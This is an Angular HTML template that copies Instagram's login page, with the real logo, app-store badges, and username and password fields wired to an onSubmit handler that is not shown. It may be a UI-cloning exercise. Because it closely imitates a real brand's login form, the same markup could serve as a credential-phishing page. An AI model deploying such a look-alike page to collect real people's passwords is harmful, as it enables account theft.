<div class="mmain">
    <div class="content">
      <div class="login-box">
        <div class="header">
          <img class="logo" src="https://upload.wikimedia.org/wikipedia/commons/thumb/2/2a/Instagram_logo.svg/1200px-Instagram_logo.svg.png" alt="Instagram">
        </div><!-- Header end -->
        <div class="form-wrap">
          <form class="form" #loginForm="ngForm" (ngSubmit)="onSubmit(loginForm)">
            <div class="input-box">
              <input type="text" id="name" placeholder="Phone number, username, or email" name="emailorusername" ngModel required>
            </div>
            <div class="input-box">
              <input type="password" id="password" placeholder="Password" name="password" ngModel required>
            </div>
            <span class="button-box">
              <button class="btn" type="submit">Log in</button>
            </span>
            <hr>
            <button class="login-button-fb" type="button">
              <span class="facebook-icon"><svg xmlns="http://www.w3.org/2000/svg" width="16" height="16" fill="currentColor" class="bi bi-facebook" viewBox="0 0 16 16">
                <path d="M16 8.049c0-4.446-3.582-8.05-8-8.05C3.58 0-.002 3.603-.002 8.05c0 4.017 2.926 7.347 6.75 7.951v-5.625h-2.03V8.05H6.75V6.275c0-2.017 1.195-3.131 3.022-3.131.876 0 1.791.157 1.791.157v1.98h-1.009c-.993 0-1.303.621-1.303 1.258v1.51h2.218l-.354 2.326H9.25V16c3.824-.604 6.75-3.934 6.75-7.951z"></path>
              </svg> </span>
              <span class="button-text">Log in with Facebook</span>
            </button>
            <a class="forgot" >Forgot password?</a>
          </form>
        </div> <!-- Form-wrap end -->
      </div> <!-- Login-box end -->
  
      <div class="login-box">
        <p class="text">Don't have an account?<a (click)="signin()">Sign up</a></p>
      </div> <!-- Signup-box end -->
  
      <div class="app">
        <p>Get the app.</p>
        <div class="app-img">
          <a href="https://itunes.apple.com/app/instagram/id389801252?pt=428156&amp;ct=igweb.loginPage.badge&amp;mt=8">
            <img src="https://www.instagram.com/static/images/appstore-install-badges/badge_ios_english-en.png/4b70f6fae447.png">
          </a>
          <a href="https://play.google.com/store/apps/details?id=com.instagram.android&amp;referrer=utm_source%3Dinstagramweb%26utm_campaign%3DloginPage%26utm_medium%3Dbadge">
            <img src="https://www.instagram.com/static/images/appstore-install-badges/badge_android_english-en.png/f06b908907d5.png">
          </a>
        </div> <!-- App-img end-->
      </div> <!-- App end -->
    </div> <!-- Content end -->
  </div>
  